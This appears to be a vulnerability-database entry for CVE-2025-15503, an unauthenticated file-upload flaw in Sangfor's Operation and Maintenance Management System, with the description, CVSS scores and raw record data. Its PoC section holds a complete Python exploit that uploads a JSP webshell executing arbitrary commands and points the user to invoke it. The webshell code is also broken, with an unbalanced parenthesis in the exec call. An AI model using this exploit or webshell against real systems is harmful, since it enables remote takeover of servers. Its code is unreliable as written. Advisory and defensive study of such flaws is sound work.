Security Vulnerability Report
CVE-2025-15503 CVSS 7.3 HIGH

CVE-2025-15503

Published: 2026-01-10 09:15:50
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in Sangfor Operation and Maintenance Management System up to and including version 3.0.8. The affected component is an unspecified function in the file /fort/trust/version/common/common.jsp. Manipulating the argument File results in unrestricted file upload. The attack can be carried out remotely. An exploit has been released publicly and may be used in attacks. The vendor was contacted early about this disclosure but did not respond.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
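CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: the 7.3 score and vector shown here are the assessment marked "Secondary" in the raw record below. The same record carries a "Primary" CVSS 3.1 assessment of 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and a CVSS 4.0 score of 5.5 MEDIUM. For an unauthenticated upload to a path that serves JSP, triage against the higher score unless local testing shows uploaded files cannot be executed.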

Configurations (Affected Products)

cpe:2.3:a:sangfor:operation_and_maintenance_security_management_system:*:*:*:*:*:*:*:* - VULNERABLE
Sangfor Operation and Maintenance Management System <= 3.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-15503 PoC - Sangfor Operation and Maintenance Management System Unrestricted File Upload # This PoC demonstrates the file upload vulnerability in Sangfor system import requests import sys def exploit(target_url, file_path): """ Exploit the unrestricted file upload vulnerability :param target_url: Target system URL (e.g., http://target.com) :param file_path: Path to the file to upload """ upload_url = f"{target_url}/fort/trust/version/common/common.jsp" # Prepare malicious file content (JSP WebShell example) malicious_content = '''<%@ page import="java.util.*,java.io.*"%> <% if (request.getParameter("cmd") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("cmd"); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>''' try: # Send file upload request files = {'File': ('shell.jsp', malicious_content, 'application/octet-stream')} response = requests.post(upload_url, files=files, timeout=10) print(f"[*] Upload request sent to: {upload_url}") print(f"[*] Status code: {response.status_code}") if response.status_code == 200: print("[+] File upload appears successful!") print("[*] Access uploaded file at: /fort/trust/version/common/shell.jsp?cmd=whoami") else: print("[-] Upload may have failed. Check manually.") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url>") print(f"Example: {sys.argv[0]} http://vulnerable-server.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit(target, 'shell.jsp')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15503", "sourceIdentifier": "[email protected]", "published": "2026-01-10T09:15:49.850", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Sangfor Operation and Maintenance Management System up to 3.0.8. The impacted element is an unknown function of the file /fort/trust/version/common/common.jsp. Performing a manipulation of the argument File results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una falla de seguridad ha sido descubierta en el Sistema de Gestión de Operación y Mantenimiento de Sangfor hasta la versión 3.0.8. El elemento afectado es una función desconocida del archivo /fort/trust/version/common/common.jsp. Realizar una manipulación del argumento File resulta en una carga sin restricciones. El ataque es posible de llevar a cabo remotamente. El exploit ha sido liberado al público y puede ser utilizado para ataques. 
El proveedor fue contactado con antelación sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": 
"UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sangfor:operation_and_maintenance_security_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.0.8", "matchCriteriaId": "C22128FB-E516-45CF-8954-7857D796A200"}]}]}], "references": [{"url": "https://github.com/master-abc/cve/issues/13", "source": "[email protected]", ... (truncated)